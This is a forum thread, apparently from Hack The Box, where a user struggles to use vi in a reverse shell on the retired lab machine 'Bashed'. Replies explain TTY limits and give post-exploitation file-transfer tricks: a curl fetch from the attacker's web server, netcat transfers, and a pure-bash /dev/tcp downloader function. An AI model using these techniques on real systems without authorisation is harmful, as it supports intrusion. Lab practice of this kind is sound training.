I hate VI!

Hi all,

Really struggling with using Vi and I feel like I need to get my head around it. Everything I have looked at online I have tried and it never seems to work as advertised. As an example, I am working on a retired box (Bashed) and need to edit a file. I have a reverse shell. The only text editor I seem to be able to open is Vi and I can't get to the point where I am actually editing! I have tried typing "i" as most things say and that does nothing. It doesn't seem to be a read only file.

Someone please help meeeeee!

Comments

  • edited July 23

    well, if you can access curl, just copy and edit the file on your machine with any text editor, put it in your html folder then service apache2 start, on target machine curl 'http://youraddress/filename' > overwritefile.example

    Hack The Box

  • Type your comment> @HEXE said:

    well, if you can access curl, just copy and edit the file on your machine with any text editor, put it in your html folder then service apache2 start, on target machine curl 'http://youraddress/filename' > overwritefile.example

    Unfortunately, no curl.

  • i'm guessing a little here since i don't have all the details, but another issue could be that you may not have a fully functional shell (you said reverse shell, which leads me to believe this).

    there have been some other threads on this, but basically with a reverse shell you typically aren't going to have things like job control and control characters (which are used to move the cursor around) may not work correctly. you also probably have default values for the size of your shell.

    section 3 of this page: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ goes over the process of getting a tty, collecting the right size information, setting your local tty to raw mode and then configuring the tty on the shell to be the right size and to use the right terminal emulation. if you do all of that, you should end up with a much more fully functional editor.

  • Type your comment> @deviate said:

    i'm guessing a little here since i don't have all the details, but another issue could be that you may not have a fully functional shell (you said reverse shell, which leads me to believe this).

    there have been some other threads on this, but basically with a reverse shell you typically aren't going to have things like job control and control characters (which are used to move the cursor around) may not work correctly. you also probably have default values for the size of your shell.

    section 3 of this page: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ goes over the process of getting a tty, collecting the right size information, setting your local tty to raw mode and then configuring the tty on the shell to be the right size and to use the right terminal emulation. if you do all of that, you should end up with a much more fully functional editor.

    Thanks, I'll have a play with this. I did use the python pty script to get myself to a proper shell to the point where I could run "su" but maybe it's not functional enough.

  • edited July 23

    There are a number of other tricks as well. If you don't have curl, you may have wget? if not, you can transfer files with nc: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/

    Really, if you can connect back to your box there will probably always be some way to transfer a file. On one retried machine I couldn't use curl, wget, nc, etc and I ended up finding this which basically does a minimal version of what curl or wget does in pure bash:

    function __curl() {
    read proto server path <<<$(echo ${1//// })
    DOC=/${path// //}
    HOST=${server//:}
    PORT=${server//
    :}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    (while read line; do
    [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
    }

    EDIT: you probably need to reply to this and copy/paste that, since I can never seem to format anything correctly on this forum. :)

  • Type your comment> @deviate said:

    There are a number of other tricks as well. If you don't have curl, you may have wget? if not, you can transfer files with nc: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/

    Really, if you can connect back to your box there will probably always be some way to transfer a file. On one retried machine I couldn't use curl, wget, nc, etc and I ended up finding this which basically does a minimal version of what curl or wget does in pure bash:

    function __curl() {
    read proto server path <<<$(echo ${1//// })
    DOC=/${path// //}
    HOST=${server//:}
    PORT=${server//
    :}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    (while read line; do
    [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
    }

    EDIT: you probably need to reply to this and copy/paste that, since I can never seem to format anything correctly on this forum. :)

    The file transfer back worked a treat with nc, not sure why I didn't think of that. Thanks!

    (I still hate vi)

  • I think your problem is more with vi being an interactive editor which does not work very well in the type of reverse shell that you have. If you cannot get a fully interactive shell (e.g. through ssh) the tips from the other posters above are very useful.
    If you simply want to add some lines to a new or existing file, you can also try "echo >> filename". To replace existing lines you can use bash/sed magic.

  • I just did this box right now and i guess one possible way to never deal with such a situation is to have a custom python script that appends your lines at the end of the file. So basically you upload your python file and run in on the server, it modifies the specified file and you dont have to deal with vi.

Sign In to comment.